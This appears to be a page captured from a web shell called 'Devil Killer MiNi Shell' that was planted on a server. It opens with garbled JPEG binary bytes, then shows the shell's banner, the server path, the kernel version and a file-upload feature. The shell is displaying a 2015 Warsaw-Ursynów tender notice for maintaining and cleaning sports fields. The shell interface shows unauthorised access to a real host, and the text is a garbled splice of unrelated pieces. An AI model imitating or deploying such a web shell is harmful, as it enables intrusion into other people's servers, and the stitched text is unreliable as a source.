JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151109/301656-N-2015.html

<p class="kh_header"><b>Warszawa: Utrzymanie porządku i czystości na terenie boisk sportowych zlokalizowanych na terenie Dzielnicy Ursynów m.st. Warszawy</b><br>
<b>Numer ogłoszenia: 301656 - 2015; data zamieszczenia: 09.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie porządku i czystości na terenie boisk sportowych zlokalizowanych na terenie Dzielnicy Ursynów m.st. Warszawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  utrzymanie porządku i czystości na terenie boisk sportowych zlokalizowanych na terenie Dzielnicy Ursynów m.st. Warszawy.

1. Zamówienie dotyczy następujących obiektów sportowo-rekreacyjnych na terenie Dzielnicy Ursynów m.st. Warszawy

a) Kompleks boisk sportowych Orlik,  przy ul. Przy Bażantarni 3 w Warszawie.
Dodatkowe informacje i zdjęcia
http://sport.ursynow.waw.pl/page/index.php?str=460&id=1462

Kompleks jest ogrodzony i objęty 24 godzinnym dozorem świadczonym na miejscu przez wynajętą firmą ochroniarską. Teren posiada jedno główne wejście, wewnątrz jest oddzielnie wejście na boisko piłkarskie, obok budynku jest wyście ewakuacyjne. Przy wejściu zlokalizowana jest tablica z regulaminem obiektu, na zewnętrznej ścianie budynku sanitarno-szatniowego zamontowana jest zamykana gablota informacyjna. Obiekt wyposażony jest w pięć stojaków rowerowych, które zlokalizowane są na pasie ziemi obsianym trawą. Na terenie boiska zlokalizowane są 4 kosze na odpady. Na terenie kompleksu boisk znajduje się też 13 ławek.

W skład kompleksu wchodzą dwa boiska: 

a) Boisko piłkarskie o wymiarach całkowitych (obejmujących płytę boiska i wybiegi) 60 x 30 metrów z nawierzchnią typu sztuczną trawa o wysokości ok. 50 mm, wyposażone w dwie bramki aluminiowe o wymiarach 5 x 2 metry.  Boisko piłkarskie wyposażone jest w piłkochwyty ustawione za bramkami i przed ogrodzeniem. 

b) Boisko wielofunkcyjne o wymiarach 19 x 32 metry i nawierzchni poliuretanowej. Boisko przeznaczone  jest do gry w piłkę koszykową oraz siatkową. Wyposażone jest w dwa kosze do koszykówki oraz montowane i demontowane w podłożu słupki do siatkówki wraz z siatką i mechanizmem naciągającym.

Kompleks boisk wyposażony jest też w budynek zaplecza socjalnego (sanitarno-szatniowy). 
Budynek sanitarno-szatniowy jest budynkiem niskim, nie podpiwniczonym, o powierzchni całkowitej 82,90 m2. i powierzchni wewnętrznej 58,20 m2. Posiada 2 okna. W pawilonie znajdują się: 2 łazienki, 2 szatnie z łazienką każda, magazyn, pokój trenera oraz dyżurka ochrony. Szatnie wyposażone są w ławki wraz z wieszakami. W sanitariatach znajdują się: 8 umywalek, 6 zbiorników klozetowych. 

Obok budynku sanitarno-szatniowego znajduje się kontener służący jako magazyn wyposażenia sportowego, wykonany z ocynkowanej blachy trapezowej. Wymiary zewnętrzne kontenera: długość 3 m, szerokość 2,2 m, wysokość 2,2 m. 

Przy wejściu równolegle do budynku sanitarno-szatniowego znajduje się prostokątny pas trawy o wymiarach około 20 x 2 metry. 

Całkowita powierzchnia kompleksu wynosi 3034,5 m2, a powierzchnia z kostki brukowej 402,50m2.

b) Ogólnodostępny kompleks boisk przy ul. Puszczyka 8, Warszawa
Dodatkowe informacje i zdjęcia:
http://sport.ursynow.waw.pl/page/index.php?str=460&id=1461

W skład kompleksu wchodzą trzy boiska:

a) Boisko piłkarskie o wymiarach 60 x 30 metrów ze sztuczną trawą o wysokości ok. 50 mm, wyposażone w dwie bramki aluminiowe o wymiarach 5 x 2 metry

b) Dwa boiska do piłki koszykowej o wymiarach 17 x 30 metrów i nawierzchni poliuretanowej.  Każde z boisk wyposażone jest w dwa kosze do koszykówki.

Boiska są ogrodzone. Boisko piłkarskie wyposażone jest w piłkochwyty rozpięte na słupach  za bramkami  i przed ogrodzeniem.  Dodatkowo boisko jest wyposażone w trybuny z miejscami dla 120 osób,  4 kosze na odpady, 1 tablicę informacyjną, 4 furtki. Na obrzeżach boisk są nawierzchnie z kostki brukowej o powierzchni w sumie. ok. 260m2.
Obiekt wyposażony jest w 4 kosze na odpady. 

Wał ziemny na którym umiejscowione są trybuny, obsiany jest trawą i krzewami. Pasy trawy zlokalizowane są także wszerz boiska - za piłkochwytami i bramkami. 

Ogólna powierzchnia terenów trawiastych i obsianych krzewami to ok. 284m2 (w tym dwa pasy trawy między piłkochwytami a ogrodzeniami - o wymiarach 30 x 1 metr każdy, dwa pasy trawy z prawej i lewej strony trybun o wymiarach 4 x 13 metrów każdy oraz obszar za trybunami - na wale ziemnym, z trawą i krzewami o wymiarach 30 x 2 metry)

c) Boisko wielofunkcyjne w Parku im. Jana Pawła II, przy ul. Romera, Warszawa Dodatkowe informacje i zdjęcia:
http://sport.ursynow.waw.pl/page/index.php?str=460&id=1590

Boisko wielofunkcyjne do piłki nożnej w poprzek którego wytyczone są dwa boiska do piłki koszykowej. Wymiary boiska 58 x 32 metry. Boisko wykonane jest ze sztucznej trawy o wysokości ok. 25 mm z wypełnieniem piaskiem kwarcowym. Wyposażone jest w dwie bramki o wymiarach 3 x 2 metry oraz cztery kosze do piłki koszykowej. 

Boisko jest ogrodzone i wyposażone w piłkochwyty za bramkami do piłki nożnej.  Między ogrodzeniem a piłkochwytami znajdują się dwa pasy trawy o wymiarach ok. 30 x 0,5, metra każdy, razem 15m2. Wzdłuż linii bocznych boiska ułożone są wąskie pasy z kostki brukowej wraz z kratkami odpływowymi - o wymiarach około 0,4 m x 56 metrów, z każdej strony boiska. Boisko nie jest wyposażone w kosze na odpady (te znajdują się w parku). 

Obok boiska zlokalizowany jest budynek szatniowo-magazynowy w Parku im. Jana Pawla II 

Pawilon jest budynkiem parterowym, nie podpiwniczonym. Powierzchnia całkowita budynku to 64,74 m2., zaś użytkowa 32,10 m2. W budynku znajdują się: szatnie, sanitariaty, magazyn sprzętu ogrodowego, dyżurka do wykorzystania przez osoby dozorujące budynek czy park. W sanitariatach znajdują się: 4 umywalki, 2 zbiorniki klozetowe, 1 pisuar.

Pawilon jest dozorowany przez agencję ochrony w godzinach 8.00-22.00. Pomieszczenia szatniowe mogą być wykorzystywane przy organizacji zawodów lub zajęć sportowych. 

d) Ogólnodostępne boiska do koszykówki przy ul. Dembowskiego (w pobliżu Szkoły Podstawowej nr 322 przy ul. Dembowskiego 4).
Dodatkowe informacje i zdjęcia:
http://sport.ursynow.waw.pl/page/index.php?str=460&id=1591

Plac do gier sportowych jest obiektem ogrodzonym o długości ogrodzenia 145 metrów bieżących z dwiema furtkami. Powierzchnia boiska to 1152m2.   Na terenie obiektu znajdują się boiska do koszykówki - jedno pełnowymiarowe oraz dwa pojedyncze kosze - znajdujące się na nawierzchni poliuretanowej. 

Obiekt wyposażony jest w 4 kosze na odpady.  Wzdłuż ogrodzenia znajduje się wąski trawnik o łącznej powierzchni około 80 metrów kwadratowych.  

W sumie boisko wyposażone jest w cztery kosze do piłki koszykowej. Obiekt wyposażony jest też w trybunę z miejscami dla 90 osób. Przy wejściu zlokalizowana jest tablica z regulaminem obiektu. Wewnątrz znajduje się nawierzchnia utwardzona o powierzchni ok. 115 m2 z kostki betonowej wraz ze schodami w kierunku trybuny. 

e) Boisko do koszykówki i siatkówki w Parku Lasek Brzozowy, w pobliżu ul. Lanciego
Dodatkowe informacje i zdjęcia:
http://www.sport.ursynow.pl/page/index.php?str=460&id=1730

Boisko do koszykówki i siatkówki o wymiarach 17 x 30 m, o nawierzchni sportowej, syntetycznej w kolorze ceglastym; boisko wyposażone jest oświetlenie w narożnikach oraz wyposażone dwa zestawy koszy do koszykówki. Za koszami do koszykówki zlokalizowane są piłkochwyty. Po jednej strony za piłkochwytami zlokalizowany jest trawnik o nieregularnym kształcie o wymiarach około 55m2. Dookoła boiska ułożona jest nawierzchnia mineralna, której elementy (piasek, kamyki) mogą być nanoszone na nawierzchnię boiska co ma wpływ na większą potrzebę jego sprzątania. Na terenie za jednym z piłkochwytów rośnie drzewo. 

Boisko jest ogrodzone, posiada oświetlenie w rogach boiska.  Ogrodzenie boiska wyposażone jest w dwie furtki wejściową.  Obiekt wyposażony  jest w 2 kosze na odpady oraz 6 ławek, zlokalizowanych wzdłuż linii bocznej boiska. 

2. Zakres usług świadczonych na terenie obiektów sportowo-rekreacyjnych wymienionych w pkt 1  - utrzymanie i sprzątanie nawierzchni boisk sportowych oraz prace porządkowe 

a) Zamiatanie nawierzchni boisk poliuretanowych 

Dotyczy następujących obiektów - boiska do koszykówki przy ul. Dembowskiego, przy ul. Puszczyka oraz w Parku Lasek Brzozowy oraz boisko wielofunkcyjnego (do koszykówki i siatkówki) na terenie kompleksu boisk Orlik przy ul. Przy Bażantarni 3. Zamiatanie musi być dokonywane dokładnie, przy użyciu narzędzi nie uszkadzających sztucznych nawierzchni.

Częstotliwość - raz na 2 tygodnie. 

b) Zbieranie i wywóz odpadów z terenu obiektów sportowych. 

Prace polegają na zbieraniu odpadów z trawników, sztucznej nawierzchni boisk sportowych, powierzchni zakrzewionych oraz wszystkich nawierzchni utwardzonych, z przekazaniem zebranych zanieczyszczeń do utylizacji.

Punkt ten obejmuje również usuwanie liści oraz innych zanieczyszczeń organicznych (gałęzie, owoce, kamienie itp.) Prace te należy przeprowadzić każdorazowo w przypadku stwierdzenia zalegania ww. odpadów na terenie prac porządkowych. Każdorazowo zgrabione liście należy przekazać do utylizacji, bezpośrednio po usunięciu. Z terenu nawierzchni boisk liście nie mogą być wygrabianie (aby nie uszkodzić nawierzchni), a powinny być usunięte za pomocą dmuchawy. 

Zanieczyszczenia typu kamienie, papier, szkło, tworzywa sztuczne, przedmioty plastikowe, gumy do żucia, przedmioty metalowe, odchody zwierzęce, niedopałki, kapsle, połamane gałęzie, liście, chwasty, itp. z terenu boisk sportowych należy zbierać 7 x w tygodniu i przekazywać do utylizacji w dniu prowadzenia prac. Dopuszcza się umieszczanie odpadów nadających się do odzysku (np. szkło opakowaniowe, plastik, metal i inne) w pojemnikach do zbierania surowców wtórnych.

Prace związane z utrzymaniem czystości i porządku oraz opróżnianiem koszy na odpady na terenie  boisk sportowych  powinny być zakończone do godziny 10:00

Częstotliwość - codziennie, tj. 7 razy w tygodniu. 

c)  Opróżnianie koszy na odpady. 

Opróżnianie koszy należy przeprowadzać 7 x w tygodniu. Po opróżnieniu kosza należy posprzątać pod koszem i w jego otoczeniu, a zebrane odpady przekazać do utylizacji, w dniu prowadzenia prac.

Kosze należy opróżniać na następujących obiektach: kompleks boisk Orlik, ul. Przy Bażantarni, boiska przy ul. Puszczyka 8 oraz boisko przy ul. Dembowskiego (wymienione w pkt. I ust. a),b),d), na każdym z nich znajdują się po 4 kosze na odpady, a także na boisku w Lasku Brzozowym (2 kosze)

W przypadku boisk przy ul. Dembowskiego (wymienionego w pkt. 1 ust. d),  należy też wraz z koszami sprzątać schody w pobliżu ogrodzenia - znajdujące się po jego zewnętrznej części.

Prace związane z utrzymaniem czystości i porządku oraz opróżnianiem koszy na odpady na terenie  boisk sportowych  powinny być zakończone do godziny 10:00 

Częstotliwość - codziennie, tj. 7  razy w tygodniu

d)  Zamiatanie nawierzchni utwardzonych (bez nawierzchni boisk).

Nawierzchnie utwardzone należy zamiatać 1 x w tygodniu.  Zebrane zanieczyszczenia typu: piasek, błoto, liście i inne, należy przekazywać do utylizacji w dniu prowadzenia prac. 

Ceny jednostkowe muszą obejmować wszystkie ww. prace porządkowe jw., załadunek i wywóz zebranych odpadów oraz opłaty za składowanie. 

Prace związane z utrzymaniem czystości i porządku oraz opróżnianiem koszy na odpady na terenie  boisk sportowych  powinny być zakończone do godziny 10:00.

Częstotliwość: 1 raz w tygodniu

e) Mycie i czyszczenie elementów małej architektury oraz wyposażenia boisk (ławek, koszy, tablic informacyjnych, krzesełek na trybunach wraz z betonową konstrukcją na której są osadzone, konstrukcji do gry w koszykówkę wraz z tablicami, bramek do gry w piłkę nożną, elementów konstrukcji piłkochwytów).

Zamawiający wymaga utrzymania w czystości elementów małej architektury i wyposażenia boisk wymienionych powyżej. Mycie elementów powinno odbywać się każdorazowo w przypadku ich zabrudzenia, stwierdzonego podczas  sprzątania obiektów lub codziennego z nich korzystania. 

Prace obejmują także czyszczenie elementów małej architektury w przypadku zabrudzenia ich w wyniku aktów wandalizmu (np. flamastrem, farbą czy w inny sposób).  Czyszczenie musi być dokonane tak, aby wszelkie ślady powstałe w wyniku aktów wandalizmu były trwale usuwane lub w przypadku braku możliwości usunięcia odpowiednio zamalowywane kolorem możliwie jak najbardziej zbliżonym do koloru elementu na którym są ślady. 

Prace należy wykonywać przy użyciu ogólnie dostępnych środków chemicznych przyjaznych dla środowiska. Usuwanie zanieczyszczeń nie może spowodować uszkodzenia jakichkolwiek elementów urządzeń infrastruktury.  

Cena ryczałtowa dotycząca tej pozycji musi obejmować koszty zakupu środków chemicznych użytych do czyszczenia poszczególnych elementów małej architektury oraz wszystkie czynności związane z ich myciem czy usunięciem zanieczyszczeń.

3. Zakres usług świadczonych na terenie obiektów sportowo-rekreacyjnych wymienionych w pkt 1  - prace ogrodnicze

a)	Koszenie trawników.

Koszenie trawników należy wykonywać sprzętem mechanicznym typu kosiarka. Kosiarki żyłkowe, spalinowe lub elektryczne można stosować do koszenia wokół elementów wzniesionych (latarnie, ogrodzenia, obrzeża, ławki). 

- Koszenie trawników nie może trwać dłużej niż 1 dzień roboczy.
- Standardem utrzymania terenu zieleni jest wysokość trawy  7 cm. 
- Koszenie należy wykonywać, w miarę możliwości, przy bezdeszczowej pogodzie.
- W trakcie realizacji oraz po zakończeniu robót na terenie boisk sportowych nie mogą zalegać resztki pokosu.
- Zebranie resztek pokosu musi następować bezpośrednio po zakończeniu koszenia.

Częstotliwość: 1 raz na miesiąc, w przypadku gdy długość i stan utrzymania trawniki są w danym miesiącu odpowiednie, trawnik nie musi być koszony

Nie dopuszcza się pryzmowania dużych ilości pokosu i pozostawiania go na dzień następny na trawnikach.

Prace związane z koszeniem trawników muszą zostać zakończone wraz z wywozem skoszonej trawy, przed dniem świątecznym (niedziele i święta ustawowo wolne od pracy).

b)	Nawożenie trawników  

Wykonywane nawozem wieloskładnikowym o spowolnionym działaniu. 
Częstotliwość - 1 raz w trakcie trwania umowy - po pierwszym koszeniu.

c)	Podlewanie trawników

Wraz  z dowozem wody -  polega na podlaniu trawników ilością wody niezbędną do ich nawodnienia. Cena musi obejmować m.in. dowóz wody. W przypadku kompleksu boisk Orlik można wykorzystać przyłącze wody w budynku sanitarno-szatniowym. W przypadku obfitych opadów w danym miesiącu lub innych przeciwwskazań związanych z podogą, podlewanie nie jest konieczne. 

Częstotliwość: 1 raz na miesiąc, 2 razy na miesiąc w czerwcu, lipcu i sierpniu.

d)  Czyszczenie chodników i krawężników z przerastającej darni, glonów, mchów, porostów, grzybów i innej roślinności.

Czynność polega na usunięciu wszystkich roślin przerastających przez łączenia i obrzeżą chodników, krawężników i kostki brukowej czy innych nawierzchni utwardzonych, uprzątnięciu i wywozie zebranych odpadów w dniu wykonywania prac. Usunięte odpady zielone wraz z ziemią powstałą przy wykonywaniu prac należy przekazać do utylizacji bezpośrednio po zakończeniu prac.

Częstotliwość: 1 raz na miesiąc, 2 razy na miesiąc w czerwcu, lipcu i sierpniu.

e)	Cięcia pielęgnacyjne  krzewów (dotyczy krzewów rosnących na wale obok boisk przy ul. Puszczyka)

Cięcia pielęgnacyjne (w tym: cięcia formujące, prześwietlające, sanitarne, korygujące) należy wykonać w taki sposób, aby pokrój charakterystyczny dla gatunku lub odmiany był zachowany. Prace powinny być wykonywane zgodnie z zasadami sztuki ogrodniczej. Zebrane odpady należy przekazać do utylizacji, bezpośrednio po zakończeniu prac.  

Częstotliwość cięć pielęgnacyjnych: 1 raz w trakcie trwania umowy. 

f) Podlewanie krzewów (dotyczy boisk przy ul. Puszczyka) 

Polega na podlaniu roślin ilością wody niezbędną do ich nawodnienia. Cena musi obejmować także dowóz wody. W przypadku kompleksu boisk Orlik można wykorzystać przyłącze wody w budynku sanitarno-szatniowym. W przypadku obfitych opadów w danym miesiącu lub innych przeciwwskazań związanych z pogodą podlewanie nie jest konieczne. 

Częstotliwość: 1 raz na miesiąc, 2 razy na miesiąc w czerwcu, lipcu i sierpniu.

g) Odchwaszczanie

Polega na usunięciu chwastów z terenów zielonych z korzeniami, z  jednoczesnym  wzruszeniem  gleby wokół szaty roślinnej. Po pierwszym zabiegu odchwaszczania należy nasadzenia wyściółkować korą - warstwa min. 5 cm grubości. 

Częstotliwość: odchwaszczanie ma się odbyć 2 x w ciągu trwania umowy

Ceny jednostkowe muszą obejmować wszystkie czynności związane z koszeniem trawników, renowacją i nawożeniem trawników, podlewaniem, odchwaszczaniem, czyszczeniem chodników i krawężników, a także załadunek i wywóz zebranych odpadów oraz opłaty za składowanie.

4. Zakres usług świadczonych na terenie obiektów sportowo-rekreacyjnych wymienionych w pkt 1.  - odśnieżanie nawierzchni utwardzonych (bez nawierzchni syntetycznej i  bez wywozu śniegu)

Zimowe utrzymanie ciągów pieszych (czyli nawierzchni utwardzonych wokół boisk) w stanie braku śliskości, należy przeprowadzać w oparciu o zgarnianie śniegu i posypywanie piaskiem. Odśnieżanie nie dotyczy sztucznych nawierzchni samych boisk.

a) Ręczne płużenie śniegu. Dopuszcza się zgarnianie śniegu ręcznie lub za pomocą lekkiego, samobieżnego sprzętu, prowadzonego przez człowieka. Wyklucza się użycie do zgarniania śniegu sprzętu ciężkiego. Zgarnięty śnieg należy gromadzić na terenie danego obiektu, wyłącznie w miejscach  wskazanych przez Zamawiającego. Wyklucza się gromadzenie pryzm śniegu przy drzewach i krzewach. 

Częstotliwość: W trakcie realizacji umowę przewiduje się maksymalnie 120-krotne ręczne płużenie śniegu na wszystkich obiektach. 

Odśnieżanie należy podejmować niezwłocznie w przypadku wystąpienia obfitych opadów śniegu, bez wezwania ze strony Zamawiającego.

b) Uszorstnianie piaskiem. Do posypywania odśnieżonych nawierzchni utwardzonych dopuszcza się jedynie piasek. Uszosrtnianie piaskiem ma być wykonywane także każdorazowo w przypadku wystąpienia gołoledzi. Wykluczone jest  użycie mieszanki piasku z solą lub soli. 

Częstotliwość: W trakcie realizacji umowy przewiduje się maksymalnie 120-krotne uszorstnianie piaskiem wszystkich nawierzchni utwardzonych. 

Ceny jednostkowe muszą obejmować wszystkie czynności związane z zimowym utrzymaniem nawierzchni utwardzonych, w tym m.in. pracę sprzętu, zakup  i dowóz  piasku.

Wykonawca zobowiązany jest zatrudnić przy realizacji przedmiotu zamówienia co najmniej jedną osobę bezrobotną z katalogu osób wskazanym w przepisach o promocji zatrudnienia i instytucjach rynku pracy.

Szczegółowy opis przedmiotu zamówienia określa również ww. treść stanowiąca załącznik nr 1 do wzoru umowy oraz:
- wzór kalkulacji powykonawczych oraz wzór raportu dotyczący realizacji prac w ramach wynagrodzenia ryczałtowego - załącznik nr 1 do SIWZ stanowiące jednocześnie odpowiednio załącznik nr 4 oraz 5 do wzoru umowy
- wzór umowy - załącznik nr 9 do SIWZ
- formularz cenowy - załącznik nr 3 do SIWZ stanowiący jednocześnie załącznik nr 2 do wzoru umowy.
Zamawiający planuje wykorzystać wartość umowy w minimum 80 %..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9, 90.50.00.00-2, 77.30.00.00-3, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 1 000,00 zł (słownie: jeden tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) wykonał1 (tj. zakończył) lub wykonuje2, co najmniej jedną usługę świadczoną przez okres co najmniej 10 miesięcy polegającą min. na utrzymaniu porządku i czystości terenów zewnętrznych. 

1 Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.
2 W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji tzn. jest wykonywana w ramach jednej umowy, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert okres świadczenia usługi- będzie nie krótszy niż okres 10 miesięcy, a dowody o których mowa potwierdzą, że usługa wykonywana jest należycie przez okres nie krótszy niż 10 miesięcy.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt III.4.1.) Ogłoszenia. Z treści załączonego oświadczenia i dokumentów  musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
